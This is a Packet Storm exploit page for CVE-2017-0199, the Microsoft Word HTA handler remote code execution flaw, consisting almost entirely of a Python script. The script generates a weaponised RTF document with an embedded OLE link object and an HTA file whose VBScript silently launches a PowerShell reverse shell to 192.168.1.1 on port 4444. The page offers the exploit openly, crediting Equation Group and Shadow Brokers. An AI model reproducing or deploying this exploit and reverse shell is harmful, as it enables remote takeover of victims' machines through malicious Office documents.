Lucene search

K
packetstormJuan SaccoPACKETSTORM:143164
HistoryJun 27, 2017 - 12:00 a.m.

Microsoft Word MTA Handler Remote Code Execution

2017-06-2700:00:00
Juan Sacco
packetstormsecurity.com
296

0.974 High

EPSS

Percentile

99.9%

`# Exploit Author: Juan Sacco at KPN Red Team  
# Developed using Exploit Pack - http://www.exploitpack.com  
<[email protected]>  
#  
# Description: Microsoft Word (CVE-2017-0199) is prone to a RCE trough  
a HTA Handler  
# A remote code execution vulnerability exists in the way that  
Microsoft Office and WordPad parse specially crafted files.  
# An attacker who successfully exploited this vulnerability could take  
control of an affected system.  
#  
# Impact: An attacker could exploit this vulnerability to execute  
arbitrary commands in the  
# context of the application. Failed exploit attempts could result in a  
# denial-of-service condition.  
#  
# Vendor homepage: http://www.microsoft.com  
#  
# Credits: @ShadowBrokerss @EquationGroup @Petya @juansacco  
  
import binascii  
def chunk_str(str, chunk_size):  
return [str[i:i+chunk_size] for i in range(0, len(str), chunk_size)]  
hta_host="" # 127.0.0.1  
for i in chunk_str(binascii.hexlify(b'http://127.0.0.1'),2):  
hta_host+= str(i+"00")  
hta_host="" # 127.0.0.1  
hta_object = "01000002090000000100000000000000"  
hta_object += "0000000000000000a4000000e0c9ea79"  
hta_object += "f9bace118c8200aa004ba90b8c000000"  
hta_object += hta_host  
hta_object += "00000000795881f43b1d7f48af2c825d"  
hta_object += "c485276300000000a5ab0000ffffffff"  
hta_object += "0609020000000000c000000000000046"  
hta_object += "00000000ffffffff0000000000000000"  
hta_object += "906660a637b5d2010000000000000000"  
hta_object += "00000000000000000000000000000000"  
hta_object += "100203000d0000000000000000000000"  
hta_object += "0"*480  
rtf_template = "{\\rtf1\\adeflang1025\\ansi\\ansicpg1252\\uc1\\adeff31507\\deff0\\stshfdbch31505\\stshfloch31506\\stshfhich31506\\stshfbi31507\\deflang1033\\deflangfe2052\\themelang1033\\themelangfe2052\\themelangcs0\r\n{\\info\r\n{\\author  
Microsoft}\r\n{\\operator Microsoft}\r\n}\r\n{\\*\\xmlnstbl {\\xmlns1  
http://schemas.microsoft.com/office/word/2003/wordml}}\r\n{\r\n{\\object\\objautlink\\objupdate\\rsltpict\\objw291\\objh230\\objscalex99\\objscaley101\r\n{\\*\\objclass  
Word.Document.8}\r\n{\\*\\objdata  
0105000002000000\r\n090000004f4c45324c696e6b000000000000000000000a0000\r\nd0cf11e0a1b11ae1000000000000000000000000000000003e000300feff0900060000000000000000000000010000000100000000000000001000000200000001000000feffffff0000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\r\nffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\r\nffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\r\nffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\r\nfffffffffffffffffdfffffffefffffffefffffffeffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\r\nffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\r\nffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\r\nffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\r\nffffffffffffffffffffffffffffffff52006f006f007400200045006e00740072007900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000016000500ffffffffffffffff020000000003000000000000c000000000000046000000000000000000000000704d\r\n6ca637b5d20103000000000200000000000001004f006c00650000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a000200ffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000\r\n000000000000000000000000f00000000000000003004f0062006a0049006e0066006f00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000120002010100000003000000ffffffff0000000000000000000000000000000000000000000000000000\r\n0000000000000000000004000000060000000000000003004c0069006e006b0049006e0066006f000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000014000200ffffffffffffffffffffffff000000000000000000000000000000000000000000000000\r\n00000000000000000000000005000000b700000000000000010000000200000003000000fefffffffeffffff0600000007000000feffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\r\nffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\r\nffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\r\nffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\r\nffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\r\n"  
rtf_template += hta_object  
rtf_template += "0105000000000000}\r\n{\\result {\\rtlch\\fcs1  
\\af31507 \\ltrch\\fcs0 \\insrsid1979324 }}}}\r\n{\\*\\datastore  
}\r\n}\r\n"  
print("[*] Microsoft Word RCE - HTA Handler by Juan Sacco")  
file_rtf = open("exploitpack.rtf","w")  
file_rtf.write(rtf_template)  
file_rtf.close()  
print("[*] RTF File created")  
print rtf_template  
# Extra bonus PS Reverse one-liner  
ps_reverse_shell = "$sm=(New-Object  
Net.Sockets.TCPClient(\"192.168.1.1\",4444)).GetStream();[byte[]]$bt=0..255|%{0};while(($i=$sm.Read($bt,0,$bt.Length))  
-ne 0){;$d=(New-Object  
Text.ASCIIEncoding).GetString($bt,0,$i);$st=([text.encoding]::ASCII).GetBytes((iex  
$d 2>&1));$sm.Write($st,0,$st.Length)}\r\n" # Reverse to 192.168.1.1  
4444  
hta_template = "<script language=\"VBScript\">\r\nSet pwnShell =  
CreateObject(\"Wscript.Shell\") \r\nSet fsObject =  
CreateObject(\"Scripting.FileSystemObject\")\r\nIf  
fsObject.FileExists(pwnShell.ExpandEnvironmentStrings(\"%PSModulePath%\")  
+ \"..\\powershell.exe\") Then\r\n pwnShell.Run \"powershell.exe  
-nop -w hidden -e "  
hta_template += ps_reverse_shell  
hta_template += "\",0\r\nEnd If\r\nwindow.close()\r\n</script>\r\n"  
file_hta = open("exploitpack.hta","w")  
file_hta.write(hta_template)  
file_hta.close()  
print("[*] HTA File created")  
print hta_template  
print("[*] Thanks NSA!")  
print("[*] Creditz: @EquationGroup @ShadowBrokers @juansacco")  
print("[*] KPN Red team: <[email protected]>")  
`

0.974 High

EPSS

Percentile

99.9%

Related for PACKETSTORM:143164